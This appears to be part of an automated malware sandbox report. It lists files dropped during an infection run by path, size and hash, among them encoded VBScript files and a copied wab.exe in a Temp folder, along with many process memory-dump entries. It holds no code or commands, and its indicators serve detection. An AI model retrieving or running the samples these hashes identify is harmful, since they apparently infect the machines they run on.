bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4B33FB012A2D26607E54B30B4788C864

Filesize
503B

MD5
b7c087baa58368ce27e6a0de583f337d

SHA1
5de42f02076f90f6d426c3c664f50f3c73dc5d11

SHA256
ec1a1a5bf85e6fbc20fc4ef2a8137bbc558924afdd917e26f386c2deb9d02477

SHA512
7376c5513458604d6b9cbb8a861ab7d85cb3d5c66cd0d7feb47b5b99e100b07a9dbd7fce9c67e32ed4e1a77374fdedce315f960bf0a0b0b7e77fa1eac19152e5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
f932b44582f3703c8894bd0a7debec9b

SHA1
429b3bd88c5ef8720a166b2bde319a4a4e2cd104

SHA256
5d83425976d76be45d7be899e1b992b14498dfd4c3576e1557f0c557b7940f5a

SHA512
f8b9b34b50f9c73a827fd1739b1bcbeb53bd5f58aee47d94e2fda344815b8aed9317279eb3db316101b2daff92055ef94c57ccb17d346e8453977eae851a36b0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4B33FB012A2D26607E54B30B4788C864

Filesize
548B

MD5
a649755838fcfba7a0f1d0df565f83a0

SHA1
20c09c82efcefeeb9f2a8f7570b31deddfd499f4

SHA256
24cf69bb6c84bac3082c153c0b49d014b16ff12764e918a5be10ab781d411360

SHA512
5feb520a04683615b2f27f1073be06145460a2e0a7db64f9b756747cf4a156d09e30c47333ad894ffbfea188e53ece9baed51f246d272231fd03fd7b43d8c649

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
712a00a9d8164b3b6795c4e11800d2f1

SHA1
82952ef15a2e4e2b06cb149d3b206d11135128b5

SHA256
2a3b20384f9ce1100ea1c1d3fc24b874446506c627102da75ace1e7bcac4a052

SHA512
ab87d76996cf96e76f9182f72ffe16b1e014ac1ccbe2991a6cd85309622365fbf4a6e79023e616c529640f626cd3943bab9338816bf6ce6831cf5696d28ecd17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
d4d8cef58818612769a698c291ca3b37

SHA1
54e0a6e0c08723157829cea009ec4fe30bea5c50

SHA256
98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

SHA512
f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
19a0a96b577f7cebe2e5745f6f58f558

SHA1
67e7416e6aec37dc6a21e08491a00c9c497280b9

SHA256
b59e2f43edaffdcc044e3b73fdd0b4d54a9f0ef53139d4d8662fbc441ee8f3f2

SHA512
a86f9ee101207d0b71dfec494502833d1d47ffab8154de98825e6c07ab673f15df6a09b78278062ff93cb8489c861e63366f3480aa6e7103a9d59853d3e007c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

Filesize
464KB

MD5
72ad21d191b58842334d32a381ea7fa8

SHA1
f7375f09855a7bce9f7a152c75e84aac69caf828

SHA256
87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729

SHA512
78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ofqtxta.4t2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dqwfkg.vbe

Filesize
897KB

MD5
61459795ee4e553ab8dddab602bf3af8

SHA1
2f4ec4ab0084c2925fb0534a3039d04c41aaaa7d

SHA256
bf20095d0508ce92f865b86cb8282b63d21844f4634d6e05d2dc49e69af27c15

SHA512
614f3303c69e7d22b117138611beedea2c69308c829ac91d7608caeaef564a8a64ffe05097637d8234af97350e1d644f641cd53f2d4ed96f1321969598d27d1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\kadkdt.vbs

Filesize
72KB

MD5
6cac0e7d6c077af15d8a5b969cfd6d4b

SHA1
4374c6079397cb524f758997567b4a64f550f7d4

SHA256
ac4f3511c547080a1539a9209a75d6a1e7ceaf2b531b5d0c8aa0dd4b7c11b541

SHA512
e00389de322a538507413cada7b1e536f8fec3680e264c50133b6ca07f63e97741bc8a4daa8e8bfa884df7dbdc14e7daddc253ba792c93563b3dd0b3bef4beb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\tvtapb.vbe

Filesize
896KB

MD5
dbe5866bb55d72813066600716474395

SHA1
671ddef8c1f04b8981e808f8c64233c89c8ed7fd

SHA256
46c622b14a31028da2b382e2676f47992f5384693aa3638165dcb02454fb5ef7

SHA512
b40c2fd0d7fec197b41801624d4e6de7b376838fcd792abc82ea8c385d7443be73728e92cbba55dbfca2baafdf13b6b585f7c498e0b2af782dd8fdc377574abf

Download Submit
C:\Users\Admin\AppData\Local\Temp\xxaaqc.vbe

Filesize
896KB

MD5
f1d487d507b6b841db8b7b72bd9ee442

SHA1
8be4ecbd352ea9717b73cda28108a5a72f1e28b7

SHA256
0026871fae17c91b3441af1af102d8867ddd3ca3f0ddf5cbb53be6ddf53de290

SHA512
91b8a1399b92c4258cfa6ce27a68723a19352012c5532cdb3273305f7fa3b3a238359c1a6264472f5cae437edc7afc7745d22e1ade09e04d7ebf5847c553331e

Download Submit
C:\Users\Admin\AppData\Roaming\Fredsaftaler.Hol

Filesize
481KB

MD5
27c4b8c6fcd86b087038197e9ba10c7c

SHA1
a39cad898a6b0e7af265075dba053f51ce401111

SHA256
76c2e3c8bebf19422fd115452d6038b54ba40a20b3cf77d073e7b1d297b1b0f1

SHA512
5aed8dfd8c336e82da0341159dfab233c157d7d052bb84cc00c8e8c7bbce02beb282712a1c2200c86540d03b236d0b78289714237c367b3b57eff9059ce51208

Download Submit
C:\Users\Admin\AppData\Roaming\Indtastningernes.Voi

Filesize
419KB

MD5
b2cfc3953c18131bd516f8d98b3b160a

SHA1
c80d15ea3dbc080c42ad0f57c1ffcc8fb4592776

SHA256
0618f3348168e845c6ee63628cc1ca4a74fc409af9fae6d63785babae682e678

SHA512
7f9bf761938cbdecd0636cc9074e0d4018556cca126ef780ee0fd5da4ff8f585c3e2dba2723474f2742d0bf6a3bb165d7beef80593e847edfcdbec6fbb7e1dd3

Download Submit
C:\Users\Admin\AppData\Roaming\Sorbet.Unb

Filesize
419KB

MD5
1c3f2054bb5bc90f98bcc6be6f0eca04

SHA1
8c2b8b87cca9b76fd64523746d202024082498ce

SHA256
8ff469d50c3017539faed1d5ee3d1adb9cd13aeabee0a3eccfed3b2a3d632d34

SHA512
c00cb6396adaa2a44212d1c3b7f654fde4eeb82e10883439ce4e16447ed1d5b8b654adb59d8913ee0acfe4b5d1be2583a383fe9cb14dc14d97845b73d378c119

Download Submit
C:\Users\Admin\AppData\Roaming\isolinolenic.Ove

Filesize
457KB

MD5
4e84ffd0da23788c462196b8a18a41d8

SHA1
47df1cc934fd33537e5ebc1d5b22c17416942fcb

SHA256
756eea271be2cd1129a843b75704228e8cfca9c088f99aa5be5840e1e5f46af2

SHA512
f975d5de5083d0999f632b090aff29e02440323da19ec56c3cf405c76b18c2167167bda12b74b8e8b8aad30bf7de85a9e33d2794a1924074907fd2ac0ef78d76

Download Submit
memory/1396-9-0x00007FFE0D2F3000-0x00007FFE0D2F5000-memory.dmp

Filesize
8KB

Download
memory/1396-19-0x000001D4F2C00000-0x000001D4F2C22000-memory.dmp

Filesize
136KB

Download
memory/1396-39-0x00007FFE0D2F0000-0x00007FFE0DDB1000-memory.dmp

Filesize
10.8MB

Download
memory/1396-20-0x00007FFE0D2F0000-0x00007FFE0DDB1000-memory.dmp

Filesize
10.8MB

Download
memory/1396-21-0x00007FFE0D2F0000-0x00007FFE0DDB1000-memory.dmp

Filesize
10.8MB

Download
memory/1424-31-0x00000128C8730000-0x00000128C89F0000-memory.dmp

Filesize
2.8MB

Download
memory/1924-33-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1924-48-0x0000000006200000-0x0000000006266000-memory.dmp

Filesize
408KB

Download
memory/1924-40-0x00000000056D0000-0x000000000576C000-memory.dmp

Filesize
624KB

Download
memory/1924-46-0x0000000005F90000-0x0000000006022000-memory.dmp

Filesize
584KB

Download
memory/1924-47-0x0000000005F60000-0x0000000005F6A000-memory.dmp

Filesize
40KB

Download
memory/1924-45-0x00000000065E0000-0x0000000006B84000-memory.dmp

Filesize
5.6MB

Download
memory/2096-124-0x0000000001000000-0x0000000002254000-memory.dmp

Filesize
18.3MB

Download
memory/2096-125-0x0000000001000000-0x000000000100E000-memory.dmp

Filesize
56KB

Download
memory/2500-110-0x0000000008D90000-0x000000000C453000-memory.dmp

Filesize
54.8MB

Download
memory/2544-109-0x0000000009020000-0x000000000BCEE000-memory.dmp

Filesize
44.8MB

Download
memory/3244-152-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-156-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-132-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3244-134-0x0000000023740000-0x000000002381C000-memory.dmp

Filesize
880KB

Download
memory/3244-190-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-192-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-188-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-133-0x0000000001200000-0x0000000001274000-memory.dmp

Filesize
464KB

Download
memory/3244-162-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-186-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-184-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-182-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-180-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-178-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-176-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-174-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-172-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-170-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-168-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-166-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-164-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-160-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-158-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-135-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-154-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-136-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-150-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-148-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-146-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-144-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-142-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-140-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3244-138-0x0000000023740000-0x0000000023817000-memory.dmp

Filesize
860KB

Download
memory/3500-58-0x0000000005280000-0x00000000052E6000-memory.dmp

Filesize
408KB

Download
memory/3500-64-0x0000000005990000-0x0000000005CE4000-memory.dmp

Filesize
3.3MB

Download
memory/3500-73-0x0000000006510000-0x000000000652A000-memory.dmp

Filesize
104KB

Download
memory/3500-74-0x0000000007250000-0x00000000072E6000-memory.dmp

Filesize
600KB

Download
memory/3500-71-0x0000000005FE0000-0x000000000602C000-memory.dmp

Filesize
304KB

Download
memory/3500-70-0x0000000005FB0000-0x0000000005FCE000-memory.dmp

Filesize
120KB

Download
memory/3500-75-0x00000000071E0000-0x0000000007202000-memory.dmp

Filesize
136KB

Download
memory/3500-55-0x0000000002670000-0x00000000026A6000-memory.dmp

Filesize
216KB

Download
memory/3500-57-0x00000000051E0000-0x0000000005202000-memory.dmp

Filesize
136KB

Download
memory/3500-72-0x0000000007620000-0x0000000007C9A000-memory.dmp

Filesize
6.5MB

Download
memory/3500-56-0x0000000005360000-0x0000000005988000-memory.dmp

Filesize
6.2MB

Download
memory/4964-6506-0x0000000000C00000-0x0000000000C74000-memory.dmp

Filesize
464KB

Download
memory/7164-6433-0x00000000061F0000-0x000000000623C000-memory.dmp

Filesize
304KB

Download
memory/7164-6431-0x0000000005D00000-0x0000000006054000-memory.dmp

Filesize
3.3MB

Download